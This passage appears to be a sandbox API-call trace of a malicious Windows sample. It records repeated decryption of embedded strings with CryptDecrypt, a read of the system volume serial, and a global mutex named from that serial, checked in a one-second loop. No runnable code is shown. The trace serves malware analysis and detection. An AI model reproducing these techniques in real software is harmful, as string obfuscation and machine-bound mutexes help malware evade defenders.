GetLastError () returned 0x0 [0134.348] GetLastError () returned 0x0 [0134.348] GetLastError () returned 0x0 [0134.348] GetLastError () returned 0x0 [0134.348] GetLastError () returned 0x0 [0134.348] GetLastError () returned 0x0 [0134.348] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x86) returned 0x2cb4598 [0134.348] RtlReAllocateHeap (Heap=0x2cb0000, Flags=0x0, Ptr=0x2cb4598, Size=0x92) returned 0x2cb4598 [0134.348] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1a) returned 0x2cb4918 [0134.351] WaitForSingleObject (hHandle=0x398, dwMilliseconds=0xffffffff) returned 0x0 [0135.402] WaitForMultipleObjects (nCount=0x4, lpHandles=0xd6fdb8*=0x218, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 47 os_tid = 0xde8 Thread: id = 48 os_tid = 0xdec Thread: id = 49 os_tid = 0xdf4 [0129.411] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb1240 [0129.411] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7cc | out: phKey=0x2c8f7cc*=0x13097f0) returned 1 [0129.411] CryptSetKeyParam (hKey=0x13097f0, dwParam=0x1, pbData=0x2c8f7b4, dwFlags=0x0) returned 1 [0129.411] CryptDecrypt (in: hKey=0x13097f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1240, pdwDataLen=0x2c8f780 | out: pbData=0x2cb1240, pdwDataLen=0x2c8f780) returned 1 [0129.411] CryptDestroyKey (hKey=0x13097f0) returned 1 [0129.411] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cb1268 [0129.411] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cb1290 [0129.411] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb12b8 [0129.411] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f73c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7a4 | out: phKey=0x2c8f7a4*=0x13096f0) returned 1 [0129.411] CryptSetKeyParam (hKey=0x13096f0, dwParam=0x1, pbData=0x2c8f78c, dwFlags=0x0) returned 1 [0129.412] CryptDecrypt (in: hKey=0x13096f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb12b8, pdwDataLen=0x2c8f758 | out: pbData=0x2cb12b8, pdwDataLen=0x2c8f758) returned 1 [0129.412] CryptDestroyKey (hKey=0x13096f0) returned 1 [0129.412] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb12b8 | out: hHeap=0x2cb0000) returned 1 [0129.412] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cb1268, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0129.412] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1290 | out: hHeap=0x2cb0000) returned 1 [0129.412] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1240 | out: hHeap=0x2cb0000) returned 1 [0129.412] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2c8f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2c8f80c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0129.412] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1268 | out: hHeap=0x2cb0000) returned 1 [0129.412] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cb1240 [0129.412] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f798, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f800 | out: phKey=0x2c8f800*=0x13098f0) returned 1 [0129.412] CryptSetKeyParam (hKey=0x13098f0, dwParam=0x1, pbData=0x2c8f7e8, dwFlags=0x0) returned 1 [0129.412] CryptDecrypt (in: hKey=0x13098f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1240, pdwDataLen=0x2c8f7b4 | out: pbData=0x2cb1240, pdwDataLen=0x2c8f7b4) returned 1 [0129.412] CryptDestroyKey (hKey=0x13098f0) returned 1 [0129.412] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb1288 [0129.412] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x0 [0129.412] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\0115B419773001") returned 0x21c [0129.412] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x0 [0129.412] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1240 | out: hHeap=0x2cb0000) returned 1 [0129.413] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1288 | out: hHeap=0x2cb0000) returned 1 [0129.413] ReleaseMutex (hMutex=0x21c) returned 1 [0129.413] CloseHandle (hObject=0x21c) returned 1 [0129.413] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1151ffe, lpParameter=0x1, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x21c [0129.413] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb1240 [0129.413] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7cc | out: phKey=0x2c8f7cc*=0x13098f0) returned 1 [0129.413] CryptSetKeyParam (hKey=0x13098f0, dwParam=0x1, pbData=0x2c8f7b4, dwFlags=0x0) returned 1 [0129.413] CryptDecrypt (in: hKey=0x13098f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1240, pdwDataLen=0x2c8f780 | out: pbData=0x2cb1240, pdwDataLen=0x2c8f780) returned 1 [0129.413] CryptDestroyKey (hKey=0x13098f0) returned 1 [0129.413] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cb1268 [0129.413] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cb1290 [0129.413] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb12b8 [0129.413] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f73c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7a4 | out: phKey=0x2c8f7a4*=0x13096f0) returned 1 [0129.413] CryptSetKeyParam (hKey=0x13096f0, dwParam=0x1, pbData=0x2c8f78c, dwFlags=0x0) returned 1 [0129.414] CryptDecrypt (in: hKey=0x13096f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb12b8, pdwDataLen=0x2c8f758 | out: pbData=0x2cb12b8, pdwDataLen=0x2c8f758) returned 1 [0129.414] CryptDestroyKey (hKey=0x13096f0) returned 1 [0129.414] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb12b8 | out: hHeap=0x2cb0000) returned 1 [0129.414] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cb1268, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0129.414] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1290 | out: hHeap=0x2cb0000) returned 1 [0129.414] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1240 | out: hHeap=0x2cb0000) returned 1 [0129.414] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2c8f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2c8f80c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0129.414] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1268 | out: hHeap=0x2cb0000) returned 1 [0129.414] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cb1240 [0129.414] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f798, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f800 | out: phKey=0x2c8f800*=0x13096f0) returned 1 [0129.414] CryptSetKeyParam (hKey=0x13096f0, dwParam=0x1, pbData=0x2c8f7e8, dwFlags=0x0) returned 1 [0129.414] CryptDecrypt (in: hKey=0x13096f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1240, pdwDataLen=0x2c8f7b4 | out: pbData=0x2cb1240, pdwDataLen=0x2c8f7b4) returned 1 [0129.414] CryptDestroyKey (hKey=0x13096f0) returned 1 [0129.414] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb1288 [0129.414] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x0 [0129.414] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\0115B419773001") returned 0x220 [0129.414] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x0) returned 0x0 [0129.414] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1240 | out: hHeap=0x2cb0000) returned 1 [0129.414] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1288 | out: hHeap=0x2cb0000) returned 1 [0129.414] ReleaseMutex (hMutex=0x220) returned 1 [0129.414] CloseHandle (hObject=0x220) returned 1 [0129.414] Sleep (dwMilliseconds=0x3e8) [0130.453] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb1470 [0130.453] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7cc | out: phKey=0x2c8f7cc*=0x13268d8) returned 1 [0130.453] CryptSetKeyParam (hKey=0x13268d8, dwParam=0x1, pbData=0x2c8f7b4, dwFlags=0x0) returned 1 [0130.453] CryptDecrypt (in: hKey=0x13268d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1470, pdwDataLen=0x2c8f780 | out: pbData=0x2cb1470, pdwDataLen=0x2c8f780) returned 1 [0130.453] CryptDestroyKey (hKey=0x13268d8) returned 1 [0130.453] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cb1498 [0130.453] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cb14c0 [0130.453] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb4410 [0130.453] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f73c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7a4 | out: phKey=0x2c8f7a4*=0x1326758) returned 1 [0130.453] CryptSetKeyParam (hKey=0x1326758, dwParam=0x1, pbData=0x2c8f78c, dwFlags=0x0) returned 1 [0130.453] CryptDecrypt (in: hKey=0x1326758, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb4410, pdwDataLen=0x2c8f758 | out: pbData=0x2cb4410, pdwDataLen=0x2c8f758) returned 1 [0130.453] CryptDestroyKey (hKey=0x1326758) returned 1 [0130.453] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4410 | out: hHeap=0x2cb0000) returned 1 [0130.453] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cb1498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0130.453] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb14c0 | out: hHeap=0x2cb0000) returned 1 [0130.453] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1470 | out: hHeap=0x2cb0000) returned 1 [0130.453] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2c8f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2c8f80c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0130.454] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1498 | out: hHeap=0x2cb0000) returned 1 [0130.454] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cb1470 [0130.454] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f798, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f800 | out: phKey=0x2c8f800*=0x13269d8) returned 1 [0130.454] CryptSetKeyParam (hKey=0x13269d8, dwParam=0x1, pbData=0x2c8f7e8, dwFlags=0x0) returned 1 [0130.454] CryptDecrypt (in: hKey=0x13269d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1470, pdwDataLen=0x2c8f7b4 | out: pbData=0x2cb1470, pdwDataLen=0x2c8f7b4) returned 1 [0130.454] CryptDestroyKey (hKey=0x13269d8) returned 1 [0130.454] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb14b8 [0130.454] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x0 [0130.454] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\0115B419773001") returned 0x2b4 [0130.454] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x0) returned 0x0 [0130.454] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1470 | out: hHeap=0x2cb0000) returned 1 [0130.454] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb14b8 | out: hHeap=0x2cb0000) returned 1 [0130.454] ReleaseMutex (hMutex=0x2b4) returned 1 [0130.454] CloseHandle (hObject=0x2b4) returned 1 [0130.454] Sleep (dwMilliseconds=0x3e8) [0131.513] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb1470 [0131.513] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7cc | out: phKey=0x2c8f7cc*=0x1327058) returned 1 [0131.513] CryptSetKeyParam (hKey=0x1327058, dwParam=0x1, pbData=0x2c8f7b4, dwFlags=0x0) returned 1 [0131.513] CryptDecrypt (in: hKey=0x1327058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1470, pdwDataLen=0x2c8f780 | out: pbData=0x2cb1470, pdwDataLen=0x2c8f780) returned 1 [0131.513] CryptDestroyKey (hKey=0x1327058) returned 1 [0131.513] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cb1498 [0131.513] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cb14c0 [0131.513] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb4410 [0131.513] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f73c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7a4 | out: phKey=0x2c8f7a4*=0x13275d8) returned 1 [0131.513] CryptSetKeyParam (hKey=0x13275d8, dwParam=0x1, pbData=0x2c8f78c, dwFlags=0x0) returned 1 [0131.513] CryptDecrypt (in: hKey=0x13275d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb4410, pdwDataLen=0x2c8f758 | out: pbData=0x2cb4410, pdwDataLen=0x2c8f758) returned 1 [0131.513] CryptDestroyKey (hKey=0x13275d8) returned 1 [0131.513] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4410 | out: hHeap=0x2cb0000) returned 1 [0131.513] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cb1498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0131.513] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb14c0 | out: hHeap=0x2cb0000) returned 1 [0131.513] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1470 | out: hHeap=0x2cb0000) returned 1 [0131.514] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2c8f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2c8f80c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0131.514] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1498 | out: hHeap=0x2cb0000) returned 1 [0131.514] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cb1470 [0131.514] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f798, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f800 | out: phKey=0x2c8f800*=0x13272d8) returned 1 [0131.514] CryptSetKeyParam (hKey=0x13272d8, dwParam=0x1, pbData=0x2c8f7e8, dwFlags=0x0) returned 1 [0131.514] CryptDecrypt (in: hKey=0x13272d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1470, pdwDataLen=0x2c8f7b4 | out: pbData=0x2cb1470, pdwDataLen=0x2c8f7b4) returned 1 [0131.514] CryptDestroyKey (hKey=0x13272d8) returned 1 [0131.514] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb14b8 [0131.514] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x0 [0131.514] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\0115B419773001") returned 0x490 [0131.514] WaitForSingleObject (hHandle=0x490, dwMilliseconds=0x0) returned 0x0 [0131.514] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1470 | out: hHeap=0x2cb0000) returned 1 [0131.514] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb14b8 | out: hHeap=0x2cb0000) returned 1 [0131.514] ReleaseMutex (hMutex=0x490) returned 1 [0131.514] CloseHandle (hObject=0x490) returned 1 [0131.514] Sleep (dwMilliseconds=0x3e8) [0132.654] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb1470 [0132.655] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7cc | out: phKey=0x2c8f7cc*=0x13273d8) returned 1 [0132.655] CryptSetKeyParam (hKey=0x13273d8, dwParam=0x1, pbData=0x2c8f7b4, dwFlags=0x0) returned 1 [0132.655] CryptDecrypt (in: hKey=0x13273d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1470, pdwDataLen=0x2c8f780 | out: pbData=0x2cb1470, pdwDataLen=0x2c8f780) returned 1 [0132.655] CryptDestroyKey (hKey=0x13273d8) returned 1 [0132.655] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cb1498 [0132.655] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cb14c0 [0132.655] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb4410 [0132.655] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f73c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7a4 | out: phKey=0x2c8f7a4*=0x1327058) returned 1 [0132.655] CryptSetKeyParam (hKey=0x1327058, dwParam=0x1, pbData=0x2c8f78c, dwFlags=0x0) returned 1 [0132.655] CryptDecrypt (in: hKey=0x1327058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb4410, pdwDataLen=0x2c8f758 | out: pbData=0x2cb4410, pdwDataLen=0x2c8f758) returned 1 [0132.655] CryptDestroyKey (hKey=0x1327058) returned 1 [0132.655] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4410 | out: hHeap=0x2cb0000) returned 1 [0132.655] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cb1498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0132.655] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb14c0 | out: hHeap=0x2cb0000) returned 1 [0132.655] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1470 | out: hHeap=0x2cb0000) returned 1 [0132.655] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2c8f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2c8f80c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0132.656] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1498 | out: hHeap=0x2cb0000) returned 1 [0132.656] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cb1470 [0132.656] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f798, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f800 | out: phKey=0x2c8f800*=0x13274d8) returned 1 [0132.656] CryptSetKeyParam (hKey=0x13274d8, dwParam=0x1, pbData=0x2c8f7e8, dwFlags=0x0) returned 1 [0132.656] CryptDecrypt (in: hKey=0x13274d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1470, pdwDataLen=0x2c8f7b4 | out: pbData=0x2cb1470, pdwDataLen=0x2c8f7b4) returned 1 [0132.656] CryptDestroyKey (hKey=0x13274d8) returned 1 [0132.656] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb14b8 [0132.656] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x0 [0132.656] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\0115B419773001") returned 0x490 [0132.656] WaitForSingleObject (hHandle=0x490, dwMilliseconds=0x0) returned 0x0 [0132.656] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1470 | out: hHeap=0x2cb0000) returned 1 [0132.656] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb14b8 | out: hHeap=0x2cb0000) returned 1 [0132.656] ReleaseMutex (hMutex=0x490) returned 1 [0132.656] CloseHandle (hObject=0x490) returned 1 [0132.657] Sleep (dwMilliseconds=0x3e8) [0133.696] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb1470 [0133.696] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7cc | out: phKey=0x2c8f7cc*=0x1326f58) returned 1 [0133.696] CryptSetKeyParam (hKey=0x1326f58, dwParam=0x1, pbData=0x2c8f7b4, dwFlags=0x0) returned 1 [0133.697] CryptDecrypt (in: hKey=0x1326f58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1470, pdwDataLen=0x2c8f780 | out: pbData=0x2cb1470, pdwDataLen=0x2c8f780) returned 1 [0133.697] CryptDestroyKey (hKey=0x1326f58) returned 1 [0133.697] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cb1498 [0133.697] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cb14c0 [0133.697] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb4410 [0133.697] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f73c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7a4 | out: phKey=0x2c8f7a4*=0x1327198) returned 1 [0133.697] CryptSetKeyParam (hKey=0x1327198, dwParam=0x1, pbData=0x2c8f78c, dwFlags=0x0) returned 1 [0133.697] CryptDecrypt (in: hKey=0x1327198, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb4410, pdwDataLen=0x2c8f758 | out: pbData=0x2cb4410, pdwDataLen=0x2c8f758) returned 1 [0133.697] CryptDestroyKey (hKey=0x1327198) returned 1 [0133.697] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4410 | out: hHeap=0x2cb0000) returned 1 [0133.697] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cb1498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0133.697] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb14c0 | out: hHeap=0x2cb0000) returned 1 [0133.697] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1470 | out: hHeap=0x2cb0000) returned 1 [0133.697] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2c8f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2c8f80c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0133.697] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1498 | out: hHeap=0x2cb0000) returned 1 [0133.697] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cb1470 [0133.697] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f798, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f800 | out: phKey=0x2c8f800*=0x13272d8) returned 1 [0133.697] CryptSetKeyParam (hKey=0x13272d8, dwParam=0x1, pbData=0x2c8f7e8, dwFlags=0x0) returned 1 [0133.697] CryptDecrypt (in: hKey=0x13272d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1470, pdwDataLen=0x2c8f7b4 | out: pbData=0x2cb1470, pdwDataLen=0x2c8f7b4) returned 1 [0133.697] CryptDestroyKey (hKey=0x13272d8) returned 1 [0133.697] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb14b8 [0133.697] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x0 [0133.698] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\0115B419773001") returned 0x490 [0133.698] WaitForSingleObject (hHandle=0x490, dwMilliseconds=0x0) returned 0x0 [0133.698] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1470 | out: hHeap=0x2cb0000) returned 1 [0133.698] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb14b8 | out: hHeap=0x2cb0000) returned 1 [0133.698] ReleaseMutex (hMutex=0x490) returned 1 [0133.698] CloseHandle (hObject=0x490) returned 1 [0133.698] Sleep (dwMilliseconds=0x3e8) [0134.955] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb4550 [0134.955] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7cc | out: phKey=0x2c8f7cc*=0x13275d8) returned 1 [0134.955] CryptSetKeyParam (hKey=0x13275d8, dwParam=0x1, pbData=0x2c8f7b4, dwFlags=0x0) returned 1 [0134.955] CryptDecrypt (in: hKey=0x13275d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb4550, pdwDataLen=0x2c8f780 | out: pbData=0x2cb4550, pdwDataLen=0x2c8f780) returned 1 [0134.955] CryptDestroyKey 